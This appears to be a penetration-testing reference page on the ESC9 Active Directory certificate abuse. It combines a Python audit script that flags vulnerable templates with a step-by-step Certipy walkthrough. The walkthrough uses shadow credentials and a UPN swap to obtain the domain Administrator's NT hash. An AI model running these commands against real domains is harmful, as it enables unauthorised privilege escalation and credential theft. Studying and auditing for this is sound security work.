Active Directory - Certificate ESC9
ESC9 - No Security Extension
Requirements
- StrongCertificateBindingEnforcement set to 1 (default) or 0
- Certificate template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value
- Certificate template specifies any client authentication EKU
- GenericWrite over any account A to compromise any account B
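As an added defender-side check (not code from the original page or from Certipy), the snippet below evaluates certificate template records against the preconditions listed above: the CT_FLAG_NO_SECURITY_EXTENSION bit in msPKI-Enrollment-Flag, a client-authentication EKU in pKIExtendedKeyUsage, and the KDC's StrongCertificateBindingEnforcement value. The attribute names are the real LDAP attributes; the template records and their values are constructed for the example.

```python
# Audit helper: report certificate templates whose settings match the ESC9
# preconditions. Template records are constructed here to mimic the LDAP
# attributes of objects under CN=Certificate Templates,CN=Public Key Services;
# in practice, feed it the msPKI-Enrollment-Flag / pKIExtendedKeyUsage values
# returned by a real query.

# Bit defined in MS-CRTD for msPKI-Enrollment-Flag: issued certificates omit
# the szOID_NTDS_CA_SECURITY_EXT (object SID) extension when it is set.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

# EKU OIDs that permit client authentication against the KDC.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

def lacks_security_extension(enrollment_flag: int) -> bool:
    """True when CT_FLAG_NO_SECURITY_EXTENSION is set in msPKI-Enrollment-Flag."""
    return bool(enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION)

def allows_client_auth(ekus) -> bool:
    """An empty EKU list means 'any purpose', which also permits client authentication."""
    return not ekus or any(oid in CLIENT_AUTH_EKUS for oid in ekus)

def esc9_candidates(templates, strong_binding_enforcement: int):
    """Return the names of templates matching the ESC9 preconditions for the given
    KDC StrongCertificateBindingEnforcement value (0 disabled, 1 compatibility,
    2 full enforcement). With 2 the KDC rejects the implicit UPN mapping that
    ESC9 relies on, so nothing is reported."""
    if strong_binding_enforcement >= 2:
        return []
    return [
        t["cn"] for t in templates
        if lacks_security_extension(t["msPKI-Enrollment-Flag"])
        and allows_client_auth(t["pKIExtendedKeyUsage"])
    ]

# Constructed sample templates (values chosen for illustration only).
SAMPLE_TEMPLATES = [
    {"cn": "ESC9", "msPKI-Enrollment-Flag": 0x00080000 | 0x20, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
    {"cn": "User", "msPKI-Enrollment-Flag": 0x29, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"]},
    {"cn": "WebServer", "msPKI-Enrollment-Flag": 0x00080000 | 0x20, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"]},
]

if __name__ == "__main__":
    print("ESC9 candidates:", esc9_candidates(SAMPLE_TEMPLATES, strong_binding_enforcement=1))
```

Templates it reports should have the flag removed or their client-authentication EKU reviewed, and the KDC moved to full enforcement once all issued certificates carry the SID extension.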
Scenario
John@corp.local has GenericWrite over Jane@corp.local, and we want to compromise Administrator@corp.local.
Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value.
- Obtain the hash of Jane with Shadow Credentials (using our GenericWrite over Jane).

    certipy shadow auto -username John@corp.local -p Passw0rd -account Jane

- Change the userPrincipalName of Jane to Administrator. Warning: set it to Administrator alone and leave out the @corp.local part.

    certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator

- Request the vulnerable certificate template ESC9 from Jane's account.

    certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
    # The userPrincipalName in the certificate is Administrator.
    # The issued certificate contains no "object SID" extension.

- Restore the userPrincipalName of Jane to Jane@corp.local.

    certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Jane@corp.local

- Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user.

    certipy auth -pfx administrator.pfx -domain corp.local
    # Add -domain <domain> to your command line, since no domain is specified in the certificate.